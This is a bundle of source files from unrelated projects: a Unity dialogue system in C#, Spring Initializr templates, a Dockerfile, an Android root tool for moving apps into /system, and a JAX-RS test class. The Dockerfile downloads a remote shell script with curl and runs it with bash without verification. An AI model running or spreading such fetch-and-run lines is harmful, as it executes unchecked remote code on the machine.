EditorGUILayout.Space();
EditorGUILayout.Space();
if (EditorGUI.EndChangeCheck())
{
serializedObject.ApplyModifiedProperties();
EditorUtility.SetDirty( this.target );
if (!Application.isPlaying)
{
EditorSceneManager.MarkSceneDirty( EditorSceneManager.GetActiveScene() );
}
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Dialogue.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Dialogue class, with all the sentences that will be displayed in the Status
/// </summary>
[System.Serializable]
public class Dialogue
{
/// <summary>
/// A List in which each <see cref="Sentence"/> contains a game dialogue line.
/// </summary>
public List<Sentence> Sentences;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/GameConversations.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
/// <summary>
/// Model of the Game Conversations, contains all the Pending Conversations with every NPC or situation.
/// If a Conversation is Triggered and it has a Pending Conversation, the Status will be changed to the one specified.
/// </summary>
public class GameConversations
{
/// <summary> Gets or sets the dictionary of the Pending Status, Key = Name of the Conversation</summary>
public Dictionary<string, List<PendingStatus>> PendingConversations { get; set; }
/// <summary> Gets or sets the list of conversations that haven't been added to PendingConversations </summary>
public List<PendingStatus> ConversationsToAdd { get; set; }
}
/// <summary>
/// Name of the Conversation and Status that is pending to be triggered
/// </summary>
[System.Serializable]
public class PendingStatus
{
/// <summary> Name of the <see cref="Conversation"/> </summary>
public string ConversationName;
/// <summary> Name of the <see cref="ConversationStatus"/> </summary>
public string StatusName;
/// <summary> Importance of the <see cref="ConversationStatus"/>, higher means more important </summary>
public int Importance;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Conversation.cs<|end_filename|>
namespace DialogueManager.Models
{
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
/// <summary>
/// The Conversation Class contains all the possible Dialogues the NPC or situation can have.
/// </summary>
[System.Serializable]
public class Conversation
{
/// <summary> Name of the conversation. </summary>
public string Name;
/// <summary> <see cref="ConversationStatus"/> of the conversation if a Dialogue was Triggered. </summary>
public ConversationStatus ActiveStatus;
/// <summary> Index in the Status List of the Active Status </summary>
public int ActiveStatusIndex;
/// <summary> List containing all the possible <see cref="ConversationStatus"/> each with it's Dialogues. </summary>
public List<ConversationStatus> Status;
/// <summary> Gets or sets the pending GameConversations of the scene </summary>
public GameConversations GameConversations { get; set; }
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Sentence.cs<|end_filename|>
namespace DialogueManager.Models
{
using UnityEngine;
/// <summary>
/// Each dialogue has several sentences, and each sentence has text, and character
/// </summary>
[System.Serializable]
public class Sentence
{
/// <summary> Character who will be talking </summary>
public Character Character;
/// <summary> Index of the used Expression in the list of the character expressions </summary>
public int ExpressionIndex;
/// <summary> The text that will be displayed. </summary>
[TextArea( 3, 10 )]
public string Paragraph;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Models/DialogueManager.cs<|end_filename|>
namespace DialogueManager.Models
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
using UnityEngine.UI;
/// <summary>
/// Model of the main Dialogue Manager
/// </summary>
[Serializable]
public class DialogueManager
{
/// <summary> Prefabs of the Dialogue Box, text and image. </summary>
public GameObject CanvasObjectsPrefab;
/// <summary> Prefab of the GameConversations. </summary>
public GameObject GameConversationsPrefab;
/// <summary> Time between each letter. </summary>
public float WaitTime = .01f;
/// <summary> Volume of the Voice of the characters. </summary>
public float VoiceVolume = 1f;
/// <summary> Is double tap. </summary>
public bool DoubleTap = true;
/// <summary> Key which must be pressed to continue to the next Sentence. </summary>
public string NextKey = "z";
/// <summary> Font </summary>
public Font Font;
/// <summary> FontMaterial </summary>
public Material Material;
/// <summary> Gets or sets the Transform marking where the dialogue text starts on the Scene. </summary>
public Transform DialogueStartPoint { get; set; }
/// <summary> Gets or sets the Image that is being displayed on the Scene. </summary>
public Image ImageText { get; set; }
/// <summary> Gets or sets the Animation that causes the Dialogue box to go up or down. </summary>
public Animator Animator { get; set; }
/// <summary> Gets or sets the Audio that the current dialogue is showing. </summary>
public AudioSource Source { get; set; }
/// <summary> Gets or sets a value indicating whether the Dialogue has finished or not. </summary>
public bool Finished { get; set; }
/// <summary> Gets or sets the <see cref="Dialogue"/> that will be displayed. </summary>
public Dialogue DialogueToShow { get; set; }
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/GameConversationsComponent.cs<|end_filename|>
namespace DialogueManager.GameComponents
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using DialogueManager.Controllers;
using DialogueManager.Models;
using UnityEngine;
/// <summary>
/// Component of all the Pending Conversations in the Game
/// </summary>
public class GameConversationsComponent : MonoBehaviour
{
/// <summary> Model of the GameConversations </summary>
public GameConversations Model;
/// <summary> Controller of the GameConversations </summary>
private GameConversationsController controller;
/// <summary> Creation of Controller and Model </summary>
private void Awake()
{
if (this.Model == null)
{
this.Model = new GameConversations();
}
this.controller = new GameConversationsController( this.Model );
}
/// <summary> Is called once per frame. </summary>
private void Update()
{
if (this.Model.ConversationsToAdd.Count > 0)
{
this.AddConversation();
}
}
/// <summary> Adds Pending Conversations to the List </summary>
private void AddConversation()
{
this.controller.AddConversation();
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/TextEffects/WaveEffect.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class WaveEffect : TextEffect
{
public float Frequency = 8.0f;
public float Magnitude = 1.5f;
public float Offset;
public WaveEffect( GameObject gameObject ) : base( gameObject )
{
}
private void Start()
{
m_startPos = this.gameObject.transform.localPosition;
}
public override void Update()
{
float y = Mathf.Sin( ( Offset + Time.time ) * Frequency ) * Magnitude;
this.gameObject.transform.localPosition = m_startPos + new Vector3( 0.0f, y, 0.0f );
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/NewConversationsEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the New Conversations unlocked
/// </summary>
public class NewConversationsEditor
{
/// <summary> Index of the displayed element in the new conversations Foldout </summary>
private static int newConversationsFoldoutDisplay = -1;
/// <summary>
/// Displays on the Inspector GUI a List of PendingStatus
/// </summary>
/// <param name="conversations">List of Pending Status (new conversations unlocked)</param>
public static void Display( List<PendingStatus> conversations )
{
if (conversations == null)
{
conversations = new List<PendingStatus>();
}
EditorGUILayout.LabelField( "New Conversations", EditorStyles.boldLabel );
for (int i = 0; i < conversations.Count; i++)
{
EditorGUI.indentLevel++;
GUILayout.BeginHorizontal();
bool display = i == newConversationsFoldoutDisplay;
display = EditorGUILayout.Foldout( display, conversations[i].ConversationName );
if (GUILayout.Button( EditorButtons.RemovePendingStatusButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
conversations.RemoveAt( i );
newConversationsFoldoutDisplay = -1;
break;
}
GUILayout.EndHorizontal();
if (!display && i == newConversationsFoldoutDisplay)
{
newConversationsFoldoutDisplay = -1;
}
if (display)
{
newConversationsFoldoutDisplay = i;
EditorGUI.indentLevel++;
conversations[i].ConversationName = EditorGUILayout.TextField( "Conversation", conversations[i].ConversationName );
conversations[i].StatusName = EditorGUILayout.TextField( "Status", conversations[i].StatusName );
conversations[i].Importance = EditorGUILayout.IntField( "Importance", conversations[i].Importance );
EditorGUI.indentLevel--;
}
EditorGUI.indentLevel--;
}
if (GUILayout.Button( EditorButtons.AddPendingStatusButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
PendingStatus pendingStatus = new PendingStatus();
conversations.Add( pendingStatus );
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/SentenceEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Linq;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for a Sentence
/// </summary>
public class SentenceEditor
{
/// <summary>
/// Displays on the Inspector GUI a Sentence
/// </summary>
/// <param name="sentence">Sentence to be displayed</param>
public static void Display( Sentence sentence)
{
sentence.Character = EditorGUILayout.ObjectField( "Character", sentence.Character, typeof( Character ), true ) as Character;
if (sentence.Character != null)
{
string[] expressionListNames = sentence.Character.Expressions.Select( e => e.Name ).ToArray();
sentence.ExpressionIndex = EditorGUILayout.Popup(
"Expression",
sentence.ExpressionIndex,
expressionListNames,
EditorStyles.popup );
EditorGUILayout.LabelField( "Paragraph:" );
EditorGUI.indentLevel++;
sentence.Paragraph = EditorGUILayout.TextArea( sentence.Paragraph, GUILayout.MaxHeight( 75 ) );
EditorGUI.indentLevel--;
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Builders/TextEffectBuilders/WaveEffectBuilder.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class WaveEffectBuilder : ITextEffectBuilder
{
private float currentOffset = 0;
public TextEffect Build( GameObject gameObject )
{
WaveEffect effect = new WaveEffect( gameObject );
effect.Offset = currentOffset;
currentOffset += 0.08f;
return effect;
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/LetterComponent.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
using UnityEngine.UI;
public class LetterComponent : MonoBehaviour
{
public Letter Model;
private void Update()
{
if (this.Model.Effect != null)
{
this.Model.Effect.Update();
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/DialogueManagerEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using UnityEngine;
using System.Collections;
using UnityEditor;
using DialogueManager.GameComponents;
[CustomEditor( typeof( DialogueManagerComponent ) )]
public class DialogueManagerEditor : Editor
{
private SerializedProperty gameConversationsProperty;
private SerializedProperty canvasObjectsProperty;
private SerializedProperty waitTimeProperty;
private SerializedProperty voiceVolumeProperty;
private SerializedProperty doubleTapProperty;
private SerializedProperty nextKeyProperty;
private SerializedProperty fontProperty;
private SerializedProperty materialProperty;
void OnEnable()
{
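            // Cache the SerializedProperty handles for the nested Model fields shown in the inspector.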
gameConversationsProperty = serializedObject.FindProperty("Model.GameConversationsPrefab");
canvasObjectsProperty = serializedObject.FindProperty( "Model.CanvasObjectsPrefab" );
waitTimeProperty = serializedObject.FindProperty( "Model.WaitTime" );
voiceVolumeProperty = serializedObject.FindProperty( "Model.VoiceVolume" );
doubleTapProperty = serializedObject.FindProperty( "Model.DoubleTap" );
nextKeyProperty = serializedObject.FindProperty( "Model.NextKey" );
fontProperty = serializedObject.FindProperty( "Model.Font" );
materialProperty = serializedObject.FindProperty( "Model.Material" );
}
public override void OnInspectorGUI()
{
serializedObject.Update();
EditorGUILayout.PropertyField(gameConversationsProperty, false);
EditorGUILayout.PropertyField( canvasObjectsProperty, false );
EditorGUILayout.PropertyField( waitTimeProperty, true );
EditorGUILayout.PropertyField( voiceVolumeProperty, true );
EditorGUILayout.PropertyField( doubleTapProperty, true );
EditorGUILayout.PropertyField( nextKeyProperty, true );
EditorGUILayout.PropertyField( fontProperty, false );
EditorGUILayout.PropertyField( materialProperty, false );
serializedObject.ApplyModifiedProperties();
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Controllers/DialogueManagerController.cs<|end_filename|>
namespace DialogueManager.Controllers
{
using System.Collections;
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEngine;
using UnityEngine.UI;
public class DialogueManagerController : MonoBehaviour
{
private Queue<string> sentences;
private Queue<Sprite> sprites;
private Queue<AudioClip> voices;
private AudioClip audioQueue;
private bool parsing;
private string timeString, sentence;
private Expression expression;
private List<LetterComponent> letters;
private List<float> speeds;
private List<ITextEffectBuilder> effects;
private int fontSize = 30;
private int boxSize = 380;
private int currentX = 0;
private int currentY = 0;
private float currentSpeed = 0.01f;
private ITextEffectBuilder currentEffect = null;
public DialogueManager Model;
public DialogueManagerController( DialogueManager Model )
{
this.Model = Model;
this.sentences = new Queue<string>();
this.sprites = new Queue<Sprite>();
this.voices = new Queue<AudioClip>();
this.letters = new List<LetterComponent>();
this.speeds = new List<float>();
this.effects = new List<ITextEffectBuilder>();
}
/// <summary>
        /// Starts the dialogue stored in Model.DialogueToShow and resets all data from previous dialogues
        /// </summary>
public void StartDialogue()
{
Dialogue dialogue = this.Model.DialogueToShow;
this.Model.DialogueToShow = null;
this.Model.Animator.SetBool( "IsOpen", true );
voices.Clear();
sprites.Clear();
sentences.Clear();
foreach (Sentence sentence in dialogue.Sentences)
{
expression = sentence.Character.Expressions[sentence.ExpressionIndex];
sprites.Enqueue( expression.Image );
sentences.Enqueue( sentence.Paragraph );
voices.Enqueue( sentence.Character.Voice );
}
}
/// <summary>
/// Display next sentence in dialogue
/// </summary>
/// <returns>If there was a Sentence to be displayed or not</returns>
public bool DisplayNextSentence()
{
foreach (LetterComponent letter in this.letters)
{
GameObject.Destroy( letter.gameObject );
}
this.currentSpeed = this.Model.WaitTime;
this.currentEffect = null;
this.effects.Clear();
this.speeds.Clear();
this.letters.Clear();
this.currentX = 0;
this.currentY = 0;
if (sentences.Count == 0)
{
EndDialogue();
return false;
}
this.Model.ImageText.sprite = sprites.Dequeue();
this.sentence = sentences.Dequeue();
this.audioQueue = voices.Dequeue();
this.Model.WaitTime = 0f;
string onlyWords = string.Empty;
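            // First pass over the raw sentence: '[value]' markers change the per-letter delay and '<name>' markers
            // switch the active text effect; everything else is kept as visible text.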
for (int i = 0; i < this.sentence.Length; i++)
{
if (this.sentence[i] == '[')
{
i = this.changeSpeed( i );
}
else if (this.sentence[i] == '<')
{
i = this.changeEffect( i );
}
else
{
this.effects.Add( this.currentEffect );
if (this.sentence[i] != ' ')
{
this.speeds.Add( ( float )this.currentSpeed );
}
onlyWords += this.sentence[i];
}
}
string[] words = onlyWords.Split( ' ' );
int letterSpacing = ( int )( this.fontSize * 0.5 );
int currentIndexEffects = 0;
int currentIndexSpeeds = 0;
foreach (string word in words)
{
GameObject wordObject = new GameObject( word, typeof( RectTransform ) );
wordObject.transform.SetParent( this.Model.DialogueStartPoint );
int wordSize = word.Length * letterSpacing;
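                // Wrap to the next line when this word would overflow the dialogue box width.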
if (this.currentX + wordSize > this.boxSize)
{
this.currentX = 0;
this.currentY -= ( int )( this.fontSize * 0.9 );
}
wordObject.GetComponent<RectTransform>().localPosition = new Vector3( currentX, currentY, 0 );
for (int i = 0; i < word.Length; i++)
{
GameObject letterObject = new GameObject( word[i].ToString() );
letterObject.transform.SetParent( wordObject.transform );
Text myText = letterObject.AddComponent<Text>();
myText.text = word[i].ToString();
myText.alignment = TextAnchor.LowerCenter;
myText.fontSize = this.fontSize;
myText.font = this.Model.Font;
myText.material = this.Model.Material;
myText.GetComponent<RectTransform>().localPosition = new Vector3( i * letterSpacing, 0, 0 );
myText.color = new Color( 0.0f, 0.0f, 0.0f, 0.0f );
RectTransform rt = letterObject.GetComponentInParent<RectTransform>();
rt.sizeDelta = new Vector2( this.fontSize, this.fontSize );
rt.pivot = new Vector2( 0, 1 );
LetterComponent letterComponent = letterObject.AddComponent<LetterComponent>();
Letter newLetter = new Letter
{
Character = word[i],
Speed = this.speeds[currentIndexSpeeds],
isActive = false
};
if (this.effects[currentIndexEffects] != null)
{
newLetter.Effect = this.effects[currentIndexEffects].Build( letterObject );
}
letterComponent.Model = newLetter;
this.letters.Add( letterComponent );
currentIndexEffects++;
currentIndexSpeeds++;
}
currentX += wordSize + letterSpacing;
currentIndexEffects++;
}
return true;
}
public int changeSpeed( int i )
{
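            // Collects the characters between '[' and ']' as the new per-letter delay (in seconds)
            // and returns the index of the closing bracket.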
i++;
string speed = string.Empty;
while (this.sentence[i] != ']')
{
speed += this.sentence[i];
i++;
}
this.currentSpeed = float.Parse( speed );
return i;
}
public int changeEffect( int i )
{
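            // Collects the effect name between '<' and '>' and looks it up in TextEffect.effects;
            // unknown names disable the current effect.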
i++;
string effect = string.Empty;
while (this.sentence[i] != '>')
{
effect += this.sentence[i];
i++;
}
if (TextEffect.effects.ContainsKey( effect ))
{
this.currentEffect = TextEffect.effects[effect];
}
else
{
this.currentEffect = null;
}
return i;
}
/// <summary>
        /// Types out the sentence one letter at a time, applying each letter's configured delay
        /// </summary>
        /// <returns>IEnumerator so the coroutine can yield between letters via WaitForSeconds</returns>
public IEnumerator TypeSentence()
{
timeString = "";
parsing = false;
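            // Reveal the letters one by one: make each visible, play the voice clip, then wait for that letter's delay.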
foreach (LetterComponent letter in this.letters)
{
if (letter == null)
{
break;
}
Text text = letter.GetComponent<Text>();
text.color = new Color( 0.0f, 0.0f, 0.0f, 1.0f );
this.Model.Source.PlayOneShot( audioQueue, this.Model.VoiceVolume );
yield return new WaitForSeconds( letter.Model.Speed );
}
this.Model.Finished = true;
}
/// <summary>
/// Hides dialogue box
/// </summary>
public void EndDialogue()
{
this.Model.Animator.SetBool( "IsOpen", false );
}
/// <summary>
        /// Parses the sentence so that it can be displayed in full.
/// </summary>
/// <param name="sentence">Sentence to be parsed.</param>
        /// <returns>Returns the complete sentence without the [time] labels</returns>
private string ParseSentence( string sentence )
{
string parsedSentence = "";
bool normalSentence = true;
foreach (char letter in sentence.ToCharArray())
{
if (letter == '[')
{
normalSentence = false;
}
if (letter == ']')
{
normalSentence = true;
}
if (normalSentence)
{
if (letter != ']')
{
parsedSentence += letter;
}
}
}
return parsedSentence;
}
}
}
| ricgby/UnityDialogueSystem |
<|start_filename|>initializr-generator/src/main/resources/templates/Application.groovy<|end_filename|>
package {{packageName}}
import org.springframework.boot.SpringApplication
{{applicationImports}}
{{applicationAnnotations}}
class {{applicationName}} {
static void main(String[] args) {
SpringApplication.run({{applicationName}}, args)
}
}
<|start_filename|>initializr-generator/src/main/resources/templates/ApplicationTests.kt<|end_filename|>
package {{packageName}}
import org.junit.Test
import org.junit.runner.RunWith
{{testImports}}
@RunWith(SpringRunner::class)
@SpringBootTest
{{testAnnotations}}class {{applicationName}}Tests {
@Test
fun contextLoads() {
}
}
<|start_filename|>initializr-generator/src/main/resources/templates/ApplicationTests.groovy<|end_filename|>
package {{packageName}}
import org.junit.Test
import org.junit.runner.RunWith
{{testImports}}
@RunWith(SpringRunner)
@SpringBootTest
{{testAnnotations}}class {{applicationName}}Tests {
@Test
void contextLoads() {
}
}
<|start_filename|>initializr-generator/src/main/resources/templates/Application.kt<|end_filename|>
package {{packageName}}
{{^kotlinSupport}}
import org.springframework.boot.SpringApplication
{{/kotlinSupport}}
{{applicationImports}}
{{#kotlinSupport}}
import org.springframework.boot.runApplication
{{/kotlinSupport}}
{{applicationAnnotations}}
class {{applicationName}}
fun main(args: Array<String>) {
{{^kotlinSupport}}
SpringApplication.run({{applicationName}}::class.java, *args)
{{/kotlinSupport}}
{{#kotlinSupport}}
runApplication<{{applicationName}}>(*args)
{{/kotlinSupport}}
}
<|start_filename|>initializr-generator/src/main/resources/templates/ServletInitializer.groovy<|end_filename|>
package {{packageName}}
import org.springframework.boot.builder.SpringApplicationBuilder
{{servletInitializrImport}}
class ServletInitializer extends SpringBootServletInitializer {
@Override
protected SpringApplicationBuilder configure(SpringApplicationBuilder application) {
application.sources({{applicationName}})
}
}
| chtompki/initializr |
<|start_filename|>docker/Dockerfile<|end_filename|>
FROM ubuntu:20.04
MAINTAINER <NAME> <<EMAIL>>
RUN apt-get update -qq \
&& DEBIAN_FRONTEND=noninteractive apt-get install -yqq \
python3-pip python3-dev libldap2-dev libsasl2-dev \
libmysqlclient-dev libffi-dev libssl-dev default-jre curl git \
&& pip3 install --upgrade pip \
&& pip3 install --upgrade setuptools tox
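# Fetch and run the docker-multi-python setup script, which supplies the extra Python interpreters used by the tox matrix.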
RUN curl https://raw.githubusercontent.com/fkrull/docker-multi-python/master/setup.sh -o /setup.sh \
&& bash setup.sh \
&& rm /setup.sh
| adamlamers/pypicloud |
<|start_filename|>src/main/java/de/j4velin/systemappmover/MoverActivity.java<|end_filename|>
/*
* Copyright 2012 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package de.j4velin.systemappmover;
import android.app.ProgressDialog;
import android.content.ActivityNotFoundException;
import android.content.DialogInterface;
import android.content.Intent;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.support.v7.app.AlertDialog;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.app.AppCompatDialog;
import android.view.View;
import android.widget.Button;
import android.widget.CheckBox;
import android.widget.CompoundButton;
import android.widget.TextView;
import com.stericson.RootTools.RootTools;
import java.io.File;
/**
* The main activity.
* <p/>
* All the logic starts in the AppPicker, which is started from the checkForRoot
* method if root is available
*/
public class MoverActivity extends AppCompatActivity {
public final static String SYSTEM_FOLDER_1 = "/system/priv-app/";
public final static String SYSTEM_FOLDER_2 = "/system/app/";
public final static String SYSTEM_DIR_TARGET =
Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT ? SYSTEM_FOLDER_1 : SYSTEM_FOLDER_2;
public static boolean SHOW_SYSTEM_APPS = false;
/**
* Shows an error dialog with the specified text
*
* @param text the error text
*/
void showErrorDialog(final String text) {
AlertDialog.Builder builder = new AlertDialog.Builder(this);
builder.setTitle("Error").setMessage(text)
.setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() {
public void onClick(final DialogInterface dialog, int id) {
try {
dialog.dismiss();
} catch (Exception e) {
e.printStackTrace();
}
}
});
builder.create().show();
}
/**
* Shows another warning when enabling the 'show system apps' option
*/
void showSystemAppWarningDialog(final String text) {
AlertDialog.Builder builder = new AlertDialog.Builder(this);
builder.setTitle("Warning").setMessage(text + " Did you make a backup?")
.setPositiveButton(android.R.string.yes, new DialogInterface.OnClickListener() {
public void onClick(final DialogInterface dialog, int id) {
try {
dialog.dismiss();
} catch (Exception e) {
e.printStackTrace();
}
}
}).setNegativeButton(android.R.string.no, new DialogInterface.OnClickListener() {
public void onClick(final DialogInterface dialog, int id) {
try {
dialog.dismiss();
showErrorDialog("You should!");
} catch (Exception e) {
e.printStackTrace();
}
}
});
builder.create().show();
}
/**
* Shows the initial warning dialog
*/
void showWarningDialog() {
final AppCompatDialog d = new AppCompatDialog(this);
d.setTitle("Warning");
d.setCancelable(false);
d.setContentView(R.layout.warningdialog);
final CheckBox c = (CheckBox) d.findViewById(R.id.c);
final Button b = (Button) d.findViewById(R.id.b);
c.setOnCheckedChangeListener(new CompoundButton.OnCheckedChangeListener() {
@Override
public void onCheckedChanged(CompoundButton compoundButton, boolean checked) {
b.setText(checked ? android.R.string.ok : android.R.string.cancel);
}
});
b.setText(android.R.string.cancel);
b.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
if (c.isChecked()) {
getSharedPreferences("settings", MODE_PRIVATE).edit()
.putBoolean("warningRead", true).commit();
d.dismiss();
} else {
d.dismiss();
finish();
}
}
});
d.show();
}
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
RootTools.debugMode = false;
checkForRoot();
}
/**
* Uses the RootTools library to check for root and busybox
*/
private void checkForRoot() {
final ProgressDialog progress =
ProgressDialog.show(this, "", "Waiting for root access", true);
progress.show();
final TextView error = (TextView) findViewById(R.id.error);
final Handler h = new Handler();
new Thread(new Runnable() {
@Override
public void run() {
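                // Check for systemless root (/su) first, then fall back to RootTools' standard root check.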
boolean systemlessRoot = new File("/su").exists();
if (!systemlessRoot && !RootTools.isRootAvailable()) {
if (!progress.isShowing()) return;
progress.cancel();
h.post(new Runnable() {
@Override
public void run() {
error.setText(
"Your device seems not to be rooted!\nThis app requires root access and does not work without.\n\nClick [here] to uninstall.");
// ask user to delete app on non-rooted devices
error.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
startActivity(new Intent(Intent.ACTION_DELETE,
Uri.parse("package:de.j4velin.systemappmover")));
}
});
}
});
return;
}
final boolean root = systemlessRoot || RootTools.isAccessGiven();
if (!progress.isShowing()) return;
progress.cancel();
h.post(new Runnable() {
@Override
public void run() {
if (root) {
((CheckBox) findViewById(R.id.root)).setChecked(true);
} else {
error.setText("No root access granted - click here to recheck");
error.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
checkForRoot();
}
});
return;
}
if (new File("/su/xbin/busybox").exists() ||
RootTools.isBusyboxAvailable()) {
CheckBox busyBox = (CheckBox) findViewById(R.id.busybox);
busyBox.setChecked(true);
busyBox.setText("BusyBox " + RootTools.getBusyBoxVersion());
new AppPicker(MoverActivity.this).execute();
if (!getSharedPreferences("settings", MODE_PRIVATE)
.getBoolean("warningRead", false)) {
showWarningDialog();
}
error.setText(
"Use at your own risk! I won't take responsibility for damages on your device! Make a backup first!");
final CheckBox showSystem = (CheckBox) findViewById(R.id.showsystem);
showSystem.setOnCheckedChangeListener(
new CompoundButton.OnCheckedChangeListener() {
@Override
public void onCheckedChanged(
final CompoundButton buttonView,
boolean isChecked) {
SHOW_SYSTEM_APPS = isChecked;
new AppPicker(MoverActivity.this).execute();
if (isChecked) {
String warning =
"Moving system apps is NOT recommended and will most definitely damage something on your system when doing so.";
if (Build.VERSION.SDK_INT >=
Build.VERSION_CODES.LOLLIPOP) {
warning +=
" On Android 5.0+, this feature is highly experimental and most system apps won\'t ever work again once moved!";
}
showSystemAppWarningDialog(warning);
}
}
});
} else {
error.setText("No busybox found!\nClick here to download");
error.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
try {
RootTools.offerBusyBox(MoverActivity.this);
} catch (ActivityNotFoundException anfe) {
MoverActivity.this.startActivity(
new Intent(Intent.ACTION_VIEW, Uri.parse(
"https://play.google.com/store/apps/details?id=stericson.busybox")));
}
finish();
}
});
}
}
});
}
}).start();
}
}
<|start_filename|>src/main/java/de/j4velin/systemappmover/AppPicker.java<|end_filename|>
/*
* Copyright 2014 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package de.j4velin.systemappmover;
import android.app.ProgressDialog;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.graphics.drawable.Drawable;
import android.os.AsyncTask;
import android.widget.ListView;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.Iterator;
import java.util.List;
/**
 * Class to list all installed apps.
* <p/>
* The actual moving happens in the AppClickListener class when an item is clicked.
*/
public class AppPicker extends AsyncTask<Void, Void, Void> {
List<Drawable> icons;
List<ApplicationInfo> apps;
PackageManager pm;
private ProgressDialog progress;
final MoverActivity activity;
public AppPicker(final MoverActivity a) {
activity = a;
}
@Override
protected void onPreExecute() {
pm = activity.getPackageManager();
progress = ProgressDialog.show(activity, "", "Loading apps", true);
}
@Override
protected void onPostExecute(Void a) {
try {
progress.cancel();
} catch (IllegalArgumentException e) {
if (BuildConfig.DEBUG) Logger.log(e);
}
if (apps == null || apps.isEmpty()) {
activity.showErrorDialog("Error loadings apps!");
} else {
ListView liste = (ListView) activity.findViewById(R.id.apps);
liste.setAdapter(new EfficientAdapter(activity, this));
liste.setOnItemClickListener(new AppClickListener(this));
}
}
@Override
protected Void doInBackground(Void... params) {
// load all apps and their icons, sort them alphabetical
apps = pm.getInstalledApplications(0);
if (!MoverActivity.SHOW_SYSTEM_APPS) {
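            // Filter out apps flagged as system apps unless the user enabled showing them.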
Iterator<ApplicationInfo> it = apps.iterator();
ApplicationInfo app;
while (it.hasNext()) {
app = it.next();
if ((app.flags & ApplicationInfo.FLAG_SYSTEM) == 1) it.remove();
}
}
try {
Collections.sort(apps, new Comparator<ApplicationInfo>() {
public int compare(final ApplicationInfo app1, final ApplicationInfo app2) {
try {
return app1.loadLabel(pm).toString().toLowerCase()
.compareTo(app2.loadLabel(pm).toString().toLowerCase());
} catch (Exception e) {
e.printStackTrace();
return 0;
}
}
});
} catch (IllegalArgumentException iae) {
}
icons = new ArrayList<Drawable>(apps.size());
try {
for (int i = 0; i < apps.size(); i++) {
icons.add(apps.get(i).loadIcon(pm));
}
} catch (OutOfMemoryError oom) {
}
return null;
}
}
| emaiannone/SystemAppMover
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/TestResource3.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.List;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.enums.SchemaType;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Path(value = "/generic")
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = MediaType.APPLICATION_JSON)
public class TestResource3 extends BaseResource2<Apple, String> {
@POST
@Path(value = "save")
public Apple update(Apple filter) {
return null;
}
@POST
@Path(value = "retrieve")
public List<Apple> update(
@QueryParam("ids") @Schema(type = SchemaType.ARRAY, implementation = Integer.class) String values) {
return null;
}
}
